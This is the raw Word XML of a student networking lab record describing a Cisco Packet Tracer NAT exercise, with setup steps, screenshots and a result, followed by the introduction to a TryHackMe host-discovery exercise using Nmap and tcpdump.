    <w:p w14:paraId="180E73AF" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1C85F28A" w14:textId="3D67FFDD" w:rsidR="0069585A" w:rsidRDefault="004C6A73" w:rsidP="00D038EC">
      <w:r>
        <w:t>Ex.</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>No:</w:t>
      </w:r>
      <w:r w:rsidR="009B0803">
        <w:t>11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73FD3A44" w14:textId="77777777" w:rsidR="004C6A73" w:rsidRDefault="004C6A73" w:rsidP="00D038EC"/>
    <w:p w14:paraId="06D47383" w14:textId="5A214503" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Aim</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F6014E0" w14:textId="77777777" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve">To configure and verify </w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Network Address Translation (NAT)</w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve"> on a router using Cisco Packet Tracer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E131F08" w14:textId="77777777" w:rsidR="004C6A73" w:rsidRDefault="004C6A73" w:rsidP="00D038EC"/>
    <w:p w14:paraId="36F8A9A9" w14:textId="76838FED" w:rsidR="00906426" w:rsidRDefault="00906426" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135014A1" w14:textId="77777777" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve">NAT allows devices in a </w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>private network (like your LAN)</w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve"> to access the </w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>internet (public network)</w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve"> using </w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>one public IP address</w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0234265B" w14:textId="46562EE5" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve"> Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B01793" w14:textId="77777777" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00906426">
        <w:t>Your home has multiple devices (PC, phone, laptop) using 192.168.x.x private IPs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F8523D1" w14:textId="77777777" w:rsidR="00906426" w:rsidRPr="00906426" w:rsidRDefault="00906426" w:rsidP="00906426">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve">Your router translates them all to one </w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>public IP</w:t>
      </w:r>
      <w:r w:rsidRPr="00906426">
        <w:t xml:space="preserve"> before sending packets to the Internet.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D9A318" w14:textId="77777777" w:rsidR="00906426" w:rsidRDefault="00906426" w:rsidP="00D038EC"/>
    <w:p w14:paraId="66C545A0" w14:textId="5CA0808D" w:rsidR="00905E6D" w:rsidRPr="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Apparatus Required</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="390CF7C6" w14:textId="77777777" w:rsidR="00905E6D" w:rsidRPr="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:t>1 × Router (Cisco 2911)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418A28F1" w14:textId="77777777" w:rsidR="00905E6D" w:rsidRPr="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:t>2 × Switches</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C51805D" w14:textId="77777777" w:rsidR="00905E6D" w:rsidRPr="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:t>3 × PCs (inside LAN)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DB64F52" w14:textId="77777777" w:rsidR="00905E6D" w:rsidRPr="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:t>1 × Server (represents the Internet)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="260DC70B" w14:textId="147093CA" w:rsidR="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00905E6D">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="28"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00905E6D">
        <w:t>Straight-through cable</w:t>
      </w:r>
      <w:r>
        <w:t>s</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4496D3" w14:textId="77777777" w:rsidR="00BF3879" w:rsidRDefault="00BF3879" w:rsidP="00BF3879"/>
    <w:p w14:paraId="7D2ABDE4" w14:textId="18A7C808" w:rsidR="00BF3879" w:rsidRDefault="00BF3879" w:rsidP="00BF3879">
      <w:r w:rsidRPr="00BF3879">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Algorithm</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3873849C" w14:textId="1D16E618" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Open Packet Tracer</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42B332C8" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="29"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:t>Add 1 router, 2 switches, 2 PCs.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB001E3" w14:textId="1285E403" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Connect Devices</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E455C7F" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="30"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:lastRenderedPageBreak/>
        <w:t>PCs → Switches → Router.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55FA57DE" w14:textId="358910E5" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Assign IPs</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0009B06D" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:t>PC0: 192.168.1.2/24, PC1: 192.168.2.2/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EC1F1BC" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:t>Router FA0/0: 192.168.1.1/24, FA0/1: 192.168.2.1/24</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41636C40" w14:textId="6659F7CE" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Enable Router Interfaces</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E3CA82A" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="32"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:t>no shutdown on both interfaces.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C1D84" w14:textId="24849924" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set NAT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D504A8" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve"> inside on internal interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E20613F" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="33"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t>nat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve"> outside on external interface</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B3F7AE9" w14:textId="0DF3C4DC" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:r w:rsidRPr="00BD011A">
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r w:rsidRPr="00BD011A">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Test Connection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5B325B" w14:textId="77777777" w:rsidR="00BD011A" w:rsidRPr="00BD011A" w:rsidRDefault="00BD011A" w:rsidP="00BD011A">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="34"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00BD011A">
        <w:t>Ping between PCs to check NAT.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55A66062" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="3F6EA04B" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="5D33BB52" w14:textId="1130B1FB" w:rsidR="0069585A" w:rsidRDefault="00905E6D" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00905E6D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Topology</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694B6EA6" w14:textId="77777777" w:rsidR="00905E6D" w:rsidRDefault="00905E6D" w:rsidP="00D038EC"/>
    <w:p w14:paraId="014230E8" w14:textId="725B5127" w:rsidR="000B6A93" w:rsidRDefault="000B6A93" w:rsidP="00D038EC">
      <w:r w:rsidRPr="000B6A93">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34453902" wp14:editId="49598121">
            <wp:extent cx="5731510" cy="2768600"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="385748330"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48330" name="Picture 1" descr="A diagram of a computer network&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="2768600"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="169D88B1" w14:textId="77777777" w:rsidR="0069585A" w:rsidRDefault="0069585A" w:rsidP="00D038EC"/>
    <w:p w14:paraId="53511172" w14:textId="39A7091F" w:rsidR="0069585A" w:rsidRDefault="000B6A93" w:rsidP="00D038EC">
      <w:r w:rsidRPr="000B6A93">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Output</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00022843" w14:textId="3FA41536" w:rsidR="00ED7A30" w:rsidRDefault="00ED7A30" w:rsidP="00D038EC">
      <w:r>
        <w:t>From Pc0 to Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="464E0EB1" w14:textId="77777777" w:rsidR="000B6A93" w:rsidRDefault="000B6A93" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7E3B9FD0" w14:textId="5DC59C9B" w:rsidR="000B6A93" w:rsidRDefault="00ED7A30" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00ED7A30">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0115CED6" wp14:editId="47078B48">
            <wp:extent cx="4810796" cy="2219635"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="53690075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00758" name="Picture 1" descr="A computer screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId33"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4810796" cy="2219635"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E13AAD" w14:textId="77777777" w:rsidR="00ED7A30" w:rsidRDefault="00ED7A30" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1531FC9B" w14:textId="23DCDD0E" w:rsidR="00ED7A30" w:rsidRDefault="00ED7A30" w:rsidP="00D038EC">
      <w:r>
        <w:t>From Pc1 to Server:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F3CE5E1" w14:textId="77777777" w:rsidR="00ED7A30" w:rsidRDefault="00ED7A30" w:rsidP="00D038EC"/>
    <w:p w14:paraId="58891B10" w14:textId="4F255C52" w:rsidR="00ED7A30" w:rsidRDefault="00BB1B9B" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00BB1B9B">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="675389EE" wp14:editId="38B1BF98">
            <wp:extent cx="4686954" cy="2295845"/>
            <wp:effectExtent l="0" t="0" r="0" b="9525"/>
            <wp:docPr id="13360506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5064" name="Picture 1" descr="A computer screen with white text&#10;&#10;AI-generated content may be incorrect."/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId34"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4686954" cy="2295845"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F366818" w14:textId="77777777" w:rsidR="00BB1B9B" w:rsidRDefault="00BB1B9B" w:rsidP="00D038EC"/>
    <w:p w14:paraId="082AD362" w14:textId="5DD2ECCA" w:rsidR="00BB1B9B" w:rsidRDefault="00C43637" w:rsidP="00D038EC">
      <w:r>
        <w:t xml:space="preserve">Checking from </w:t>
      </w:r>
      <w:r w:rsidR="00480DF7">
        <w:t>both th</w:t>
      </w:r>
      <w:r w:rsidR="001D117F">
        <w:t xml:space="preserve">e pcs </w:t>
      </w:r>
      <w:r w:rsidR="00E622CE">
        <w:t>in router cli</w:t>
      </w:r>
      <w:r w:rsidR="00D51E3E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00902196">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7450539E" w14:textId="77777777" w:rsidR="00902196" w:rsidRDefault="00902196" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7258397C" w14:textId="4C561346" w:rsidR="00902196" w:rsidRDefault="00902196" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00902196">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="1D2E36EE" wp14:editId="67B07604">
            <wp:extent cx="5731510" cy="3735070"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="122942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29713" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId35"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5731510" cy="3735070"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="56875302" w14:textId="77777777" w:rsidR="0049204D" w:rsidRDefault="0049204D" w:rsidP="00D038EC"/>
    <w:p w14:paraId="778E934A" w14:textId="073FD390" w:rsidR="00214472" w:rsidRDefault="00580F99" w:rsidP="00D038EC">
      <w:r w:rsidRPr="0049204D">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Attachment</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00ED7FD0" w:rsidRPr="00ED7FD0">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33598B70" w14:textId="77777777" w:rsidR="0049204D" w:rsidRDefault="0049204D" w:rsidP="00D038EC"/>
    <w:p w14:paraId="4A62C92D" w14:textId="51381214" w:rsidR="0049204D" w:rsidRDefault="00E957B4" w:rsidP="00D038EC">
      <w:r>
        <w:object w:dxaOrig="1520" w:dyaOrig="987" w14:anchorId="4ACC9432">
          <v:shape id="_x0000_i1028" type="#_x0000_t75" style="width:75.6pt;height:49.2pt" o:ole="">
            <v:imagedata r:id="rId36" o:title=""/>
          </v:shape>
          <o:OLEObject Type="Embed" ProgID="Package" ShapeID="_x0000_i1028" DrawAspect="Icon" ObjectID="_1823145912" r:id="rId37"/>
        </w:object>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F76F9F" w14:textId="4CE3F91F" w:rsidR="00E622CE" w:rsidRDefault="00E622CE" w:rsidP="00D038EC">
      <w:r w:rsidRPr="00F11AE3">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Result</w:t>
      </w:r>
      <w:r w:rsidR="00F11AE3">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C48E9FF" w14:textId="77777777" w:rsidR="00BF3879" w:rsidRPr="00BF3879" w:rsidRDefault="00BF3879" w:rsidP="00BF3879">
      <w:r w:rsidRPr="00BF3879">
        <w:t xml:space="preserve">All PCs in the private LAN can successfully communicate with the external (public) network using the router’s public IP through </w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3879">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>NAT</w:t>
      </w:r>
      <w:r w:rsidRPr="00BF3879">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6073219C" w14:textId="77777777" w:rsidR="00BF3879" w:rsidRDefault="00BF3879" w:rsidP="00D038EC"/>
    <w:p w14:paraId="3F69A928" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1E489F00" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="5AD4E887" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="7ADBD665" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="0EB926C4" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="553745F9" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1ABA285F" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="5E3A8CE0" w14:textId="77777777" w:rsidR="00451695" w:rsidRDefault="00451695" w:rsidP="00D038EC"/>
    <w:p w14:paraId="1BA322E1" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t>NMAP TO DISCOVER HOSTS USING ARP SCAN, ICMP SCAN AND TCPDUMP PING SCAN IN TRYHACKME PLATFORM</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C7DCE94" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="616AF07C" w14:textId="561B0466" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r>
        <w:t>Ex. No:12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E98B464" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803"/>
    <w:p w14:paraId="234D3706" w14:textId="77777777" w:rsidR="009B0803" w:rsidRPr="00F13BE9" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Introduction</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64449AB9" w14:textId="77777777" w:rsidR="009B0803" w:rsidRDefault="009B0803" w:rsidP="009B0803">
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve">Discovering live hosts is the first step in network enumeration. Different techniques find hosts in different situations: </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ARP scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve"> discovers machines on the same Ethernet/LAN by asking “who has this IP?”, </w:t>
      </w:r>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>ICMP scan</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve"> (Ping) asks hosts to respond to ICMP Echo Requests, and a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>tcpdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F13BE9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ping-style capture</w:t>
      </w:r>
      <w:r w:rsidRPr="00F13BE9">
        <w:t xml:space="preserve"> records the actual probe and reply packets on the network so you can verify what’s sent and received. Combining these methods gives a fuller picture because some hosts block ICMP or TCP probes but still respond to ARP, and packet capture shows the raw traffic for troubleshooting and proof.</w:t>
      </w:r>
    </w:p>
